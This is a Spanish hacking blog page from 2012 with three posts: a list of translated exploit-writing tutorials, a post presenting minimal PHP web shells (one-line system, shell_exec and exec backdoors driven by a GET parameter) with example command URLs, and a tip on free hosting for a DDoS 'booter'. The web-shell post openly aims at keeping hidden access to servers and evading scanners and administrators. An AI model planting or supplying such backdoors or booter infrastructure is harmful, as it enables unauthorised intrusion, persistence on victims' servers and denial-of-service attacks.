jueves, 27 de septiembre de 2012
Creación de Exploits por corelanc0d3r traducidos por Ivinson
Hace poco nuestro amigo Ivinson de cracklatinos se puso a traducir los tutoriales de "Creación de Exploit" de corelanc0d3r, lo cual le estoy agradecido por su trabajo y el ya lo sabe xD.
Aquí les dejo la lista de tutoriales traducidos al español así que disfrutenlo.
Creación de Exploits 1: Desbordamiento de Stack por corelanc0d3r traducido por Ivinson
Creación de Exploits 2: Desbordamiento de Stack por corelanc0d3r traducido por Ivinson
Creación de Exploits 3: SEH por corelanc0d3r traducido por Ivinson
Creación de Exploits 3b: SEH por corelanc0d3r traducido por Ivinson
Creacion de Exploits 4: De Exploit a Metasploit por corelanc0d3r traducido por Ivinson
Creación de Exploits 5: Acelerar el Proceso con Plugins y módulos por corelanc0d3r traducido por Ivinson
viernes, 7 de septiembre de 2012
Backdorea con las Shell Web mas pequeñas!
De seguro ya habrán visto algunos funciones PHP que te ejecutan comandos como si estuvieran en una shell y con las cuales podemos hacer un backdoor y mantener el acceso en un servidor.
Además les quiero mostrar algunos códigos ingeniosos para llegar a ello y asi pasar desapercibido ante un scanner o hasta el mismísimo administrador Web.
Además les quiero mostrar algunos códigos ingeniosos para llegar a ello y asi pasar desapercibido ante un scanner o hasta el mismísimo administrador Web.
Para comenzar les voy a listar los mas conocidos y detectados a simple vista:
system.php
<?@system($_GET[_]);?>
ww2.pwnakil.com/PoC/shell/system.php?_=ls -a
ww2.pwnakil.com/PoC/shell/system.php?_=ls -a
shell_exec.php
<?=@shell_exec($_GET[_])?>
ww2.pwnakil.com/PoC/shell/shell_exec.php?_=ls -a
ww2.pwnakil.com/PoC/shell/shell_exec.php?_=ls -a
exec.php
<?=@exec($_GET[_])?>
ww2.pwnakil.com/PoC/shell/exec.php?_=ls -a
ww2.pwnakil.com/PoC/shell/exec.php?_=ls -a
jueves, 6 de septiembre de 2012
Hosting Free para tu Booter
Paseando por internet, me tope con esta Web la cual ofrece un servicio de hosting gratis con Cpanel, lo unico que tienes que tener es un dominio, puede ser de pago o free como estos uni.me.
Aqui esta la direccion hyperhosts.com.
Aqui esta la direccion hyperhosts.com.
Suscribirse a:
Entradas (Atom)